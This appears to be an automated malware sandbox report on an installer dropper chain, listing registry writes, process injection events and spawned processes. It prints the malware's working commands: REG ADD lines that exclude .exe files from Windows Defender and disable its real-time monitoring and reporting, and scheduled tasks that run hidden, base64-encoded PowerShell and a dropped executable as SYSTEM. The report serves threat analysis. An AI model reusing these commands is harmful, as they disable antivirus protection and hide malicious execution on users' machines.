Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-37-ac-c9-90-6b\WpadDetectedUrl C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft C:\Windows\SysWOW64\wscript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-37-ac-c9-90-6b C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-37-ac-c9-90-6b\WpadDecisionTime = 30d275d41034db01 C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1703934C-BB3D-4660-A426-7C1A9ECA713B} C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1703934C-BB3D-4660-A426-7C1A9ECA713B}\3e-37-ac-c9-90-6b C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-37-ac-c9-90-6b\WpadDecisionReason = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-37-ac-c9-90-6b C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-37-ac-c9-90-6b\WpadDecisionTime = 30d275d41034db01 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-37-ac-c9-90-6b\WpadDetectedUrl C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1804 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe
PID 1804 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe
PID 1804 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe
PID 1804 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe
PID 1804 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe
PID 1804 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe
PID 1804 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe
PID 2160 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe
PID 2160 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe
PID 2160 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe
PID 2160 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe
PID 2160 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe
PID 2160 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe
PID 2160 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe
PID 2732 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2632 wrote to memory of 2644 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2644 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2644 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2644 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2644 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2644 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2644 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2644 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2652 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2652 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2652 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2652 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2652 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2652 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2652 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2652 wrote to memory of 2400 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gEDlVAekT" /SC once /ST 02:34:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gEDlVAekT"

C:\Windows\system32\taskeng.exe

taskeng.exe {27060871-541F-48DA-9983-D97FD8321013} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gEDlVAekT"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 08:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe\" sw /site_id 525403 /S" /V1 /F

C:\Windows\system32\taskeng.exe

taskeng.exe {E7D37AEC-52BB-4548-8C6F-972E6D0BCF3B} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe

C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe sw /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gUABfsEIY" /SC once /ST 06:48:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gUABfsEIY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gUABfsEIY"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

